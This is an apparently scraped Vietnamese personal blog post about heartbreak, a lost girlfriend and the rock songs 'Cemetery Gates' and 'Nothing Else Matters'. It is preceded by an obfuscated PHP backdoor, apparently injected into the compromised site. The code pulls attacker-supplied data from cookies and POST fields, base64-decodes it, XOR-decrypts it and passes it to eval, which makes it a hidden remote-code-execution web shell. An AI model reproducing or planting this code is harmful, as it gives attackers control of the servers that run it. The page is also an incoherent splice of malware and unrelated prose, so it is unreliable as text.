$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> nothing else matters – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

nothing else matters

Pantera – band thrash mà em thích chỉ sau Megadeth, có một bài tên là Cemetery Gates rất hay. Trên đường đi làm về, em đi ngang qua một nghĩa trang. Lần nào chuẩn bị tới đó, em cũng canh chỉnh bài này (dĩ nhiên là trừ lúc em quên). Bài “Cemetery Gates” có một câu mà lần nào nghe, em cũng rất buồn:

You left me incomplete
All alone as the memories still remain

***

Cô ấy quay đi, bỏ lại một em không trọn vẹn. Mặc dù em vẫn là em, hiền lành cộng với tài ba, dễ thương lại thêm ngoan ngoãn, nhưng em biết, đã có gì đó trong em bị đánh cắp đi.
Kể từ khi cô ấy xa em, những cuốn sách đầy chữ duy nhất em đọc là sách phục vụ cho việc học và các tiểu thuyết tiên hiệp đầy rẫy trên mạng.
Kể từ khi em xa cô ấy, em nghe rock ít hẳn đi. Hay nói đúng ra là em không nghe rock một mình nữa.

***

Chiều nay, lục lại mớ quần áo tìm cho mình cái áo Pantera mới mua để mặc đi xem rock, em thấy cái áo quây của cô ấy. Là của cô ấy, chứ không phải của cô gái nào khác. Em biết thế, dù cho em không thể ngửi ra cái mùi quen thuộc của cô ấy (mà thật ra, em cũng quên rồi).

Old stuff brings back old memory…

***

Em nghe James đánh guitar thùng rất nhẹ nhàng và hát Nothing else matters. Em cúi đầu, lắc thật mạnh. Người ta nhìn vào sẽ không biết là mắt em đang rất buồn, đâu nhỉ?

***

Em đọc blog cô ấy, thấy cô ấy có vẻ buồn. Em gửi tin nhắn ngoài YM, không thấy cô ấy reply.

Là do cô ấy, hay do YM nhỉ?

À, dù sao, cũng là nothing else matters

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.